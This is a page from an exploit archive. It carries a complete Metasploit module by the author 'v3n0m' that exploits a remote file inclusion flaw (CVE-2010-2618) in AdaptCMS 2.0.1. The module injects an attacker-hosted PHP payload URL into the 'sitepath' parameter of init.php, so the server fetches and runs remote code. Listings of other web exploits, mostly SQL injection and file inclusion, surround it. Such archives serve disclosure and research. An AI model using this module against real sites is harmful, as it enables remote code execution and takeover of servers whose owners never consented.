Menu

Search for hundreds of thousands of exploits

"AdaptCMS 2.0.1 Beta - Remote File Inclusion (Metasploit)"

Author

Exploit author

v3n0m

Platform

Exploit platform

php

Release date

Exploit published date

2010-10-12

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
##
#      )   )            )                     (   (         (   (    (       )     ) 
#  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
#  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
# ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
#__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
#\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
# \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
#  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
#										.WEB.ID
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::HttpServer::PHPInclude

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AdaptCMS 2.0.1 Beta Released Remote File Inclusion Exploit',
			'Description'    => %q{
					This module can be used to exploit Remote File Inclusion in AdaptCMS 2.0.1 or earlier in file /inc/smarty/libs/init.php.

			},
			'Author'         => [ 'v3n0m' , 'Yogyacarderlink-Indonesia' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision:$',
			'References'     => 				
				[
					[ 'CVE', '2010-2618' ],
					[ 'BID', '41116' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Compat'      =>
						{
							'ConnectionType' => 'find',
						},
					'Space'       => 262144, # 256k
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Oct 12 2010',
			'DefaultTarget' => 0))

		register_options([
			OptString.new('PHPURI', [ true , "The URI to request, with the include parameter changed to !URL!", '/inc/smarty/libs/init.php?sitepath=!URL!']),
			], self.class)
	end

	def php_exploit

		timeout = 0.01
		uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
		print_status("Trying uri #{uri}")

		response = send_request_raw( {
				'global' => true,
				'uri' => uri,
			},timeout)

		if response and response.code != 200
			print_error("Server returned non-200 status code (#{response.code})")
		end
		
		handler
	end

end
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-07-09 "FrootVPN 4.8 - 'frootvpn' Unquoted Service Path" local windows v3n0m
2017-09-06 "Cory Support - 'pr' SQL Injection" webapps php v3n0m
2017-01-11 "iTechscripts Freelancer Script 5.11 - 'sk' SQL Injection" webapps php v3n0m
2017-01-09 "Friends in War Make or Break 1.7 - 'imgid' SQL Injection" webapps php v3n0m
2012-12-26 "Guru Auction 2.0 - Multiple SQL Injections" webapps php v3n0m
2012-01-20 "ICTimeAttendance - Authentication Bypass" webapps asp v3n0m
2011-08-17 "SoftwareDEP Classified Script 2.5 - SQL Injection (1)" webapps php v3n0m
2011-07-31 "Joomla! Component obSuggest - Local File Inclusion" webapps php v3n0m
2011-07-21 "Joomla! Component JE Story Submit - Local File Inclusion" webapps php v3n0m
2011-05-30 "Guru JustAnswer Professional 1.25 - Multiple SQL Injections" webapps php v3n0m
2011-05-28 "Guru Penny Auction Pro 3.0 - Blind SQL Injection" webapps php v3n0m
2010-12-24 "iDevSpot iDevCart 1.10 - Multiple Local File Inclusions" webapps php v3n0m
2010-12-20 "Joomla! Component JotLoader 2.2.1 - Local File Inclusion" webapps php v3n0m
2010-12-17 "Softbiz PHP Joke Site Software - Multiple SQL Injections" webapps php v3n0m
2010-11-16 "BPConferenceReporting Web Reporting - Authentication Bypass" webapps asp v3n0m
2010-11-16 "Joomla! Component com_maianmedia - SQL Injection" webapps php v3n0m
2010-11-16 "BPRealestate Real Estate - Authentication Bypass" webapps asp v3n0m
2010-11-16 "BPDirectory Business Directory - Authentication Bypass" webapps asp v3n0m
2010-11-16 "BPAffiliate Affiliate Tracking - Authentication Bypass" webapps asp v3n0m
2010-11-14 "BSI Advance Hotel Booking System 1.0 - SQL Injection" webapps php v3n0m
2010-11-13 "Webmatic - 'index.php' SQL Injection" webapps php v3n0m
2010-10-12 "AdaptCMS 2.0.1 Beta - Remote File Inclusion (Metasploit)" webapps php v3n0m
2010-08-07 "Joomla! Component NeoRecruit 1.4 - SQL Injection" webapps php v3n0m
2010-07-10 "Joomla! Component redSHOP 1.0 - 'pid' SQL Injection" webapps php v3n0m
2010-07-10 "My Kazaam Address & Contact ORGanizer - SQL Injection" webapps php v3n0m
2010-07-02 "Mp3 Digitalbox 2.7.2.0 - '.mp3' Local Stack Overflow (PoC)" dos windows v3n0m
2010-06-30 "Joomla! Component Gamesbox 1.0.2 - 'id' SQL Injection" webapps php v3n0m
2010-06-29 "YPNinc PHP Realty Script - 'docID' SQL Injection" webapps php v3n0m
2010-06-29 "YPNinc JokeScript - 'ypncat_id' SQL Injection" webapps php v3n0m
2010-06-29 "PageDirector CMS - 'result.php' SQL Injection" webapps php v3n0m
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.